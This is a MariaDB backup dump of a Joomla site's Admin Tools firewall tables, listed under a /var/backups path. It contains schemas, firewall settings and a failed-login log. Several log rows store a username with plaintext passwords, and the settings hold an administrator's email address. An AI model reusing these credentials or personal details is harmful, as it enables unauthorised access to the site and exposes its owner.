File: //var/backups/mysql/smthsmth
-- MariaDB dump 10.19 Distrib 10.5.18-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost Database: smthsmth
-- ------------------------------------------------------
-- Server version 10.5.18-MariaDB-0+deb11u1
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
--
-- Table structure for table `atlyh_admintools_acl`
--
DROP TABLE IF EXISTS `atlyh_admintools_acl`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_admintools_acl` (
`user_id` bigint(20) unsigned NOT NULL,
`permissions` mediumtext DEFAULT NULL,
PRIMARY KEY (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_admintools_acl`
--
LOCK TABLES `atlyh_admintools_acl` WRITE;
/*!40000 ALTER TABLE `atlyh_admintools_acl` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_admintools_acl` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_admintools_adminiplist`
--
DROP TABLE IF EXISTS `atlyh_admintools_adminiplist`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_admintools_adminiplist` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`ip` varchar(255) DEFAULT NULL,
`description` varchar(255) DEFAULT NULL,
UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_admintools_adminiplist`
--
LOCK TABLES `atlyh_admintools_adminiplist` WRITE;
/*!40000 ALTER TABLE `atlyh_admintools_adminiplist` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_admintools_adminiplist` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_admintools_badwords`
--
DROP TABLE IF EXISTS `atlyh_admintools_badwords`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_admintools_badwords` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`word` varchar(255) DEFAULT NULL,
UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_admintools_badwords`
--
LOCK TABLES `atlyh_admintools_badwords` WRITE;
/*!40000 ALTER TABLE `atlyh_admintools_badwords` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_admintools_badwords` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_admintools_cookies`
--
DROP TABLE IF EXISTS `atlyh_admintools_cookies`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_admintools_cookies` (
`series` varchar(255) NOT NULL,
`client_hash` varchar(255) NOT NULL,
`valid_to` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
PRIMARY KEY (`series`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_admintools_cookies`
--
LOCK TABLES `atlyh_admintools_cookies` WRITE;
/*!40000 ALTER TABLE `atlyh_admintools_cookies` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_admintools_cookies` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_admintools_customperms`
--
DROP TABLE IF EXISTS `atlyh_admintools_customperms`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_admintools_customperms` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`path` varchar(255) NOT NULL,
`perms` varchar(4) DEFAULT '0644',
UNIQUE KEY `id` (`id`),
KEY `path` (`path`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_admintools_customperms`
--
LOCK TABLES `atlyh_admintools_customperms` WRITE;
/*!40000 ALTER TABLE `atlyh_admintools_customperms` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_admintools_customperms` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_admintools_filescache`
--
DROP TABLE IF EXISTS `atlyh_admintools_filescache`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_admintools_filescache` (
`admintools_filescache_id` bigint(20) NOT NULL AUTO_INCREMENT,
`path` varchar(2048) NOT NULL,
`filedate` int(11) NOT NULL DEFAULT 0,
`filesize` int(11) NOT NULL DEFAULT 0,
`data` blob DEFAULT NULL,
`checksum` varchar(32) NOT NULL DEFAULT '',
PRIMARY KEY (`admintools_filescache_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_admintools_filescache`
--
LOCK TABLES `atlyh_admintools_filescache` WRITE;
/*!40000 ALTER TABLE `atlyh_admintools_filescache` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_admintools_filescache` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_admintools_ipautoban`
--
DROP TABLE IF EXISTS `atlyh_admintools_ipautoban`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_admintools_ipautoban` (
`ip` varchar(255) NOT NULL,
`reason` varchar(255) DEFAULT 'other',
`until` datetime DEFAULT NULL,
UNIQUE KEY `ip` (`ip`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_admintools_ipautoban`
--
LOCK TABLES `atlyh_admintools_ipautoban` WRITE;
/*!40000 ALTER TABLE `atlyh_admintools_ipautoban` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_admintools_ipautoban` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_admintools_ipautobanhistory`
--
DROP TABLE IF EXISTS `atlyh_admintools_ipautobanhistory`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_admintools_ipautobanhistory` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`ip` varchar(255) NOT NULL,
`reason` varchar(255) DEFAULT 'other',
`until` datetime DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_admintools_ipautobanhistory`
--
LOCK TABLES `atlyh_admintools_ipautobanhistory` WRITE;
/*!40000 ALTER TABLE `atlyh_admintools_ipautobanhistory` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_admintools_ipautobanhistory` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_admintools_ipblock`
--
DROP TABLE IF EXISTS `atlyh_admintools_ipblock`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_admintools_ipblock` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`ip` varchar(255) DEFAULT NULL,
`description` varchar(255) DEFAULT NULL,
UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_admintools_ipblock`
--
LOCK TABLES `atlyh_admintools_ipblock` WRITE;
/*!40000 ALTER TABLE `atlyh_admintools_ipblock` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_admintools_ipblock` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_admintools_log`
--
DROP TABLE IF EXISTS `atlyh_admintools_log`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_admintools_log` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`logdate` datetime NOT NULL,
`ip` varchar(40) DEFAULT NULL,
`url` varchar(255) DEFAULT NULL,
`reason` enum('other','adminpw','ipwl','ipbl','sqlishield','antispam','wafblacklist','tpone','tmpl','template','muashield','csrfshield','badbehaviour','geoblocking','rfishield','dfishield','uploadshield','xssshield','httpbl','loginfailure','securitycode','external','awayschedule','admindir','sessionshield') DEFAULT NULL,
`extradata` mediumtext DEFAULT NULL,
UNIQUE KEY `id` (`id`),
KEY `idx_admintools_log_logdate_reason` (`logdate`,`reason`)
) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_admintools_log`
--
LOCK TABLES `atlyh_admintools_log` WRITE;
/*!40000 ALTER TABLE `atlyh_admintools_log` DISABLE KEYS */;
INSERT INTO `atlyh_admintools_log` VALUES (1,'2016-02-25 18:36:20','::1','http://localhost:8888/dashlogic/administrator/index.php','loginfailure','Username: crashtackle -- Password: u5vWea'),(2,'2016-02-25 20:12:25','::1','http://localhost:8888/dashlogic/administrator/index.php','loginfailure','Username: crashtackle -- Password: u5vWea'),(3,'2016-02-25 20:28:05','::1','http://localhost:8888/dashlogic/administrator/index.php','loginfailure','Username: crashtackle -- Password: u5vWea'),(4,'2016-02-25 20:36:01','::1','http://localhost:8888/dashlogic/administrator/index.php','loginfailure','Username: crashtackle -- Password: u5vWea'),(5,'2016-02-25 20:36:17','::1','http://localhost:8888/dashlogic/administrator/index.php','loginfailure','Username: crashtackle -- Password: u5vweatackle'),(6,'2016-03-08 12:52:46','::1','http://localhost:8888/dashlogic/administrator/index.php','loginfailure','Username: crashtackle -- Password: u5vWea'),(7,'2016-03-08 12:52:59','::1','http://localhost:8888/dashlogic/administrator/index.php','loginfailure','Username: crashtackle -- Password: u5vWea');
/*!40000 ALTER TABLE `atlyh_admintools_log` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_admintools_profiles`
--
DROP TABLE IF EXISTS `atlyh_admintools_profiles`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_admintools_profiles` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`description` varchar(255) NOT NULL,
`configuration` longtext DEFAULT NULL,
`filters` longtext DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_admintools_profiles`
--
LOCK TABLES `atlyh_admintools_profiles` WRITE;
/*!40000 ALTER TABLE `atlyh_admintools_profiles` DISABLE KEYS */;
INSERT INTO `atlyh_admintools_profiles` VALUES (1,'Default PHP Change Scanner Profile','','');
/*!40000 ALTER TABLE `atlyh_admintools_profiles` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_admintools_redirects`
--
DROP TABLE IF EXISTS `atlyh_admintools_redirects`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_admintools_redirects` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`source` varchar(255) DEFAULT NULL,
`dest` varchar(255) DEFAULT NULL,
`ordering` bigint(20) NOT NULL DEFAULT 0,
`published` tinyint(1) NOT NULL DEFAULT 1,
`keepurlparams` tinyint(1) NOT NULL DEFAULT 1,
UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_admintools_redirects`
--
LOCK TABLES `atlyh_admintools_redirects` WRITE;
/*!40000 ALTER TABLE `atlyh_admintools_redirects` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_admintools_redirects` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_admintools_scanalerts`
--
DROP TABLE IF EXISTS `atlyh_admintools_scanalerts`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_admintools_scanalerts` (
`admintools_scanalert_id` bigint(20) NOT NULL AUTO_INCREMENT,
`path` varchar(2048) NOT NULL,
`scan_id` bigint(20) NOT NULL DEFAULT 0,
`diff` mediumtext DEFAULT NULL,
`threat_score` int(11) NOT NULL DEFAULT 0,
`acknowledged` tinyint(4) NOT NULL DEFAULT 0,
PRIMARY KEY (`admintools_scanalert_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_admintools_scanalerts`
--
LOCK TABLES `atlyh_admintools_scanalerts` WRITE;
/*!40000 ALTER TABLE `atlyh_admintools_scanalerts` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_admintools_scanalerts` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_admintools_scans`
--
DROP TABLE IF EXISTS `atlyh_admintools_scans`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_admintools_scans` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`description` varchar(255) NOT NULL,
`comment` longtext DEFAULT NULL,
`backupstart` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
`backupend` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
`status` enum('run','fail','complete') NOT NULL DEFAULT 'run',
`origin` varchar(30) NOT NULL DEFAULT 'backend',
`type` varchar(30) NOT NULL DEFAULT 'full',
`profile_id` bigint(20) NOT NULL DEFAULT 1,
`archivename` longtext DEFAULT NULL,
`absolute_path` longtext DEFAULT NULL,
`multipart` int(11) NOT NULL DEFAULT 0,
`tag` varchar(255) DEFAULT NULL,
`backupid` varchar(255) DEFAULT NULL,
`filesexist` tinyint(3) NOT NULL DEFAULT 1,
`remote_filename` varchar(1000) DEFAULT NULL,
`total_size` bigint(20) NOT NULL DEFAULT 0,
PRIMARY KEY (`id`),
KEY `idx_fullstatus` (`filesexist`,`status`),
KEY `idx_stale` (`status`,`origin`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_admintools_scans`
--
LOCK TABLES `atlyh_admintools_scans` WRITE;
/*!40000 ALTER TABLE `atlyh_admintools_scans` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_admintools_scans` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_admintools_storage`
--
DROP TABLE IF EXISTS `atlyh_admintools_storage`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_admintools_storage` (
`key` varchar(255) NOT NULL,
`value` longtext NOT NULL,
PRIMARY KEY (`key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_admintools_storage`
--
LOCK TABLES `atlyh_admintools_storage` WRITE;
/*!40000 ALTER TABLE `atlyh_admintools_storage` DISABLE KEYS */;
INSERT INTO `atlyh_admintools_storage` VALUES ('cparams','{\"ipworkarounds\":\"1\",\"ipwl\":\"0\",\"ipbl\":1,\"adminpw\":\"\",\"nonewadmins\":\"1\",\"sqlishield\":1,\"antispam\":0,\"custgenerator\":1,\"generator\":\"MYOB\",\"tpone\":1,\"tmpl\":1,\"template\":1,\"logbreaches\":1,\"emailonadminlogin\":\"bevan@webspring.co.za\",\"emailonfailedadminlogin\":\"bevan@webspring.co.za\",\"emailbreaches\":\"bevan@webspring.co.za\",\"muashield\":1,\"csrfshield\":0,\"rfishield\":1,\"dfishield\":1,\"badbehaviour\":0,\"bbstrict\":0,\"bbhttpblkey\":\"\",\"bbwhitelistip\":\"\",\"tsrenable\":1,\"tsrstrikes\":3,\"tsrnumfreq\":1,\"tsrfrequency\":\"minute\",\"tsrbannum\":15,\"tsrbanfrequency\":\"minute\",\"spammermessage\":\"You are a spammer, hacker or an otherwise bad person.\",\"uploadshield\":1,\"xssshield\":0,\"xssshield_safe_keys\":\"password, passwd, token, _token, password1, password2, text\",\"xssshield_allowphp\":0,\"nofesalogin\":\"0\",\"tmplwhitelist\":\"component,system,raw,koowa\",\"neverblockips\":\"\",\"emailafteripautoban\":\"bevan@webspring.co.za\",\"custom403msg\":\"\",\"httpblenable\":0,\"httpblthreshold\":25,\"httpblmaxage\":30,\"httpblblocksuspicious\":0,\"allowsitetemplate\":0,\"trackfailedlogins\":1,\"use403view\":0,\"showpwonloginfailure\":1,\"iplookup\":\"ip-lookup.net\\/index.php?ip={ip}\",\"iplookupscheme\":\"http\",\"saveusersignupip\":1,\"twofactorauth\":0,\"twofactorauth_secret\":\"\",\"twofactorauth_panic\":\"\",\"whitelist_domains\":\".googlebot.com,.search.msn.com\",\"reasons_nolog\":\"geoblocking\",\"reasons_noemail\":\"geoblocking\",\"resetjoomlatfa\":0,\"email_throttle\":1,\"permaban\":1,\"permabannum\":3,\"deactivateusers_num\":0,\"deactivateusers_numfreq\":1,\"deactivateusers_frequency\":\"day\",\"awayschedule_from\":\"\",\"awayschedule_to\":\"\",\"adminlogindir\":\"\",\"blockedemaildomains\":\"\",\"quickstart\":1,\"htconfig\":\"eyJodHRwc2hvc3QiOiJsb2NhbGhvc3QiLCJodHRwaG9zdCI6ImxvY2FsaG9zdCIsInN5bWxpbmtzIjowLCJyZXdyaXRlYmFzZSI6IiIsImZpbGVvcmRlciI6MSwiZXhwdGltZSI6MSwiYXV0b2NvbXByZXNzIjoxLCJmb3JjZWd6aXAiOjEsImF1dG9yb290IjowLCJ3d3dyZWRpciI6MiwiaHN0c2hlYWRlciI6MCwibm9mcmFtZSI6MCwibm90cmFjZXRyYWNrIjoxLCJjb3JzIjowLCJ1dGY4Y2hhcnNldCI6MSwiZXRhZ3R5cGUiOiJkZWZhdWx0Iiwibm9kaXJsaXN0cyI6MSwiZmlsZWluaiI6MSwicGhwZWFzdGVyIjoxLCJub2hvZ2dlcnMiOjEsImxlZnRvdmVycyI6MSwiY2xpY2tqYWNraW5nIjoxLCJyZWR1Y2VtaW1ldHlwZXJpc2tzIjoxLCJyZWZsZWN0ZWR4c3MiOjEsIm5vc2VydmVyc2lnbmF0dXJlIjoxLCJub3RyYW5zZm9ybSI6MSwiaG9nZ2VyYWdlbnRzIjpbIldlYkJhbmRpdCIsIndlYmJhbmRpdCIsIkFjdW5ldGl4IiwiYmlubGFyIiwiQmxhY2tXaWRvdyIsIkJvbHQgMCIsIkJvdCBtYWlsdG86Y3JhZnRib3RAeWFob28uY29tIiwiQk9UIGZvciBKQ0UiLCJjYXNwZXIiLCJjaGVja3ByaXZhY3kiLCJDaGluYUNsYXciLCJjbHNodHRwIiwiY21zd29ybGRtYXAiLCJjb21vZG8iLCJDdXN0byIsIkRlZmF1bHQgQnJvd3NlciAwIiwiZGlhdm9sIiwiRElJYm90IiwiRElTQ28iLCJkb3Rib3QiLCJEb3dubG9hZCBEZW1vbiIsImVDYXRjaCIsIkVpckdyYWJiZXIiLCJFbWFpbENvbGxlY3RvciIsIkVtYWlsU2lwaG9uIiwiRW1haWxXb2xmIiwiRXhwcmVzcyBXZWJQaWN0dXJlcyIsImV4dHJhY3QiLCJFeHRyYWN0b3JQcm8iLCJFeWVOZXRJRSIsImZlZWRmaW5kZXIiLCJGSHNjYW4iLCJGbGFzaEdldCIsImZsaWNreSIsIkdldFJpZ2h0IiwiR2V0V2ViISIsIkdvLUFoZWFkLUdvdC1JdCIsIkdvIVppbGxhIiwiZ3JhYiIsIkdyYWJOZXQiLCJHcmFmdWxhIiwiaGFydmVzdCIsIkhNVmlldyIsImlhX2FyY2hpdmVyIiwiSW1hZ2UgU3RyaXBwZXIiLCJJbWFnZSBTdWNrZXIiLCJJbnRlckdFVCIsIkludGVybmV0IE5pbmphIiwiSW50ZXJuZXRTZWVyLmNvbSIsImpha2FydGEiLCJKYXZhIiwiSmV0Q2FyIiwiSk9DIFdlYiBTcGlkZXIiLCJrbWNjcmV3IiwibGFyYmluIiwiTGVlY2hGVFAiLCJsaWJ3d3ciLCJNYXNzIERvd25sb2FkZXIiLCJNYXh0aG9uJCIsIm1pY3Jvc29mdC51cmwiLCJNSURvd24gdG9vbCIsIm1pbmVyIiwiTWlzdGVyIFBpWCIsIk5FV1QiLCJNU0Zyb250UGFnZSIsIk5hdnJvYWQiLCJOZWFyU2l0ZSIsIk5ldCBWYW1waXJlIiwiTmV0QW50cyIsIk5ldFNwaWRlciIsIk5ldFpJUCIsIm51dGNoIiwiT2N0b3B1cyIsIk9mZmxpbmUgRXhwbG9yZXIiLCJPZmZsaW5lIE5hdmlnYXRvciIsIlBhZ2VHcmFiYmVyIiwiUGFwYSBGb3RvIiwicGF2dWsiLCJwY0Jyb3dzZXIiLCJQZW9wbGVQYWwiLCJwbGFuZXR3b3JrIiwicHNib3QiLCJwdXJlYm90IiwicHljdXJsIiwiUmVhbERvd25sb2FkIiwiUmVHZXQiLCJSaXBwZXJzIDAiLCJTZWFNb25rZXkkIiwic2l0ZWNoZWNrLmludGVybmV0c2Vlci5jb20iLCJTaXRlU25hZ2dlciIsInNreWdyaWQiLCJTbWFydERvd25sb2FkIiwic3Vja2VyIiwiU3VwZXJCb3QiLCJTdXBlckhUVFAiLCJTdXJmYm90IiwidEFrZU91dCIsIlRlbGVwb3J0IFBybyIsIlRvYXRhIGRyYWdvc3RlYSBtZWEgcGVudHJ1IGRpYXZvbGEiLCJ0dXJuaXQiLCJ2aWtzcGlkZXIiLCJWb2lkRVlFIiwiV2ViIEltYWdlIENvbGxlY3RvciIsIldlYiBTdWNrZXIiLCJXZWJBdXRvIiwiV2ViQ29waWVyIiwiV2ViRmV0Y2giLCJXZWJHbyBJUyIsIldlYkxlYWNoZXIiLCJXZWJSZWFwZXIiLCJXZWJTYXVnZXIiLCJXZWJzaXRlIGVYdHJhY3RvciIsIldlYnNpdGUgUXVlc3RlciIsIldlYlN0cmlwcGVyIiwiV2ViV2hhY2tlciIsIldlYlpJUCIsIldpZG93IiwiV1dXLU1lY2hhbml6ZSIsIldXV09GRkxFIiwiWGFsZG9uIFdlYlNwaWRlciIsIllhbmRleCIsIlpldXMiLCJ6bWV1IiwiQ2F6b29kbGVCb3QiLCJkaXNjb2JvdCIsImVjeGkiLCJHVDo6V1dXIiwiaGVyaXRyaXgiLCJIVFRQOjpMaXRlIiwiSFRUcmFjayIsImlhX2FyY2hpdmVyIiwiaWQtc2VhcmNoIiwiaWQtc2VhcmNoLm9yZyIsIklEQm90IiwiSW5keSBMaWJyYXJ5IiwiSVJMYm90IiwiSVNDIFN5c3RlbXMgaVJjIFNlYXJjaCAyLjEiLCJMaW5rc01hbmFnZXIuY29tX2JvdCIsImxpbmt3YWxrZXIiLCJsd3AtdHJpdmlhbCIsIk1GQ19UZWFyX1NhbXBsZSIsIk1pY3Jvc29mdCBVUkwgQ29udHJvbCIsIk1pc3NpZ3VhIExvY2F0b3IiLCJwYW5zY2llbnQuY29tIiwiUEVDTDo6SFRUUCIsIlBIUENyYXdsIiwiUGxlYXNlQ3Jhd2wiLCJTQklkZXIiLCJTbm9vcHkiLCJTdGVlbGVyIiwiVVJJOjpGZXRjaCIsInVybGxpYiIsIldlYiBTdWNrZXIiLCJ3ZWJhbHRhIiwiV2ViQ29sbGFnZSIsIldlbGxzIFNlYXJjaCBJSSIsIldFUCBTZWFyY2giLCJ6ZXJtZWxvIiwiWnlCb3JnIiwiSW5keSBMaWJyYXJ5IiwibGlid3d3LXBlcmwiLCJHbyFaaWxsYSIsIlR1cm5pdGluQm90Il0sImJhY2tlbmRwcm90IjoxLCJmcm9udGVuZHByb3QiOjEsImJlcGV4ZGlycyI6WyJjb21wb25lbnRzIiwibW9kdWxlcyIsInRlbXBsYXRlcyIsImltYWdlcyIsInBsdWdpbnMiXSwiYmVwZXh0eXBlcyI6WyJqcGUiLCJqcGciLCJqcGVnIiwianAyIiwianBlMiIsInBuZyIsImdpZiIsImJtcCIsImNzcyIsImpzIiwic3dmIiwiaHRtbCIsIm1wZyIsIm1wMyIsIm1wZWciLCJtcDQiLCJhdmkiLCJ3YXYiLCJvZ2ciLCJvZ3YiLCJ4bHMiLCJ4bHN4IiwiZG9jIiwiZG9jeCIsInBwdCIsInBwdHgiLCJ6aXAiLCJyYXIiLCJwZGYiLCJ4cHMiLCJ0eHQiLCI3eiIsInN2ZyIsIm9kdCIsIm9kcyIsIm9kcCIsImZsdiIsIm1vdiIsImh0bSIsInR0ZiIsIndvZmYiLCJ3b2ZmMiIsImVvdCIsIkpQRyIsIkpQRUciLCJQTkciLCJHSUYiLCJDU1MiLCJKUyIsIlRURiIsIldPRkYiLCJXT0ZGMiIsIkVPVCJdLCJmZXBleGRpcnMiOlsiY29tcG9uZW50cyIsIm1vZHVsZXMiLCJ0ZW1wbGF0ZXMiLCJpbWFnZXMiLCJwbHVnaW5zIiwibWVkaWEiLCJsaWJyYXJpZXMiLCJtZWRpYVwvanVpXC9mb250cyJdLCJmZXBleHR5cGVzIjpbImpwZSIsImpwZyIsImpwZWciLCJqcDIiLCJqcGUyIiwicG5nIiwiZ2lmIiwiYm1wIiwiY3NzIiwianMiLCJzd2YiLCJodG1sIiwibXBnIiwibXAzIiwibXBlZyIsIm1wNCIsImF2aSIsIndhdiIsIm9nZyIsIm9ndiIsInhscyIsInhsc3giLCJkb2MiLCJkb2N4IiwicHB0IiwicHB0eCIsInppcCIsInJhciIsInBkZiIsInhwcyIsInR4dCIsIjd6Iiwic3ZnIiwib2R0Iiwib2RzIiwib2RwIiwiZmx2IiwibW92IiwiaWNvIiwiaHRtIiwidHRmIiwid29mZiIsIndvZmYyIiwiZW90IiwiSlBHIiwiSlBFRyIsIlBORyIsIkdJRiIsIkNTUyIsIkpTIiwiVFRGIiwiV09GRiIsIldPRkYyIiwiRU9UIl0sImZ1bGxhY2Nlc3NkaXJzIjpbXX0=\"}'),('fixperms_stack','{\"folders\":[],\"files\":[],\"total\":0,\"done\":0}');
/*!40000 ALTER TABLE `atlyh_admintools_storage` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_admintools_wafblacklists`
--
DROP TABLE IF EXISTS `atlyh_admintools_wafblacklists`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_admintools_wafblacklists` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`option` varchar(255) NOT NULL,
`view` varchar(255) NOT NULL,
`task` varchar(255) NOT NULL,
`query` varchar(255) NOT NULL,
`query_type` varchar(1) NOT NULL,
`query_content` varchar(255) NOT NULL,
`verb` varchar(6) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_admintools_wafblacklists`
--
LOCK TABLES `atlyh_admintools_wafblacklists` WRITE;
/*!40000 ALTER TABLE `atlyh_admintools_wafblacklists` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_admintools_wafblacklists` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_admintools_wafexceptions`
--
DROP TABLE IF EXISTS `atlyh_admintools_wafexceptions`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_admintools_wafexceptions` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`option` varchar(255) DEFAULT NULL,
`view` varchar(255) DEFAULT NULL,
`query` varchar(255) DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_admintools_wafexceptions`
--
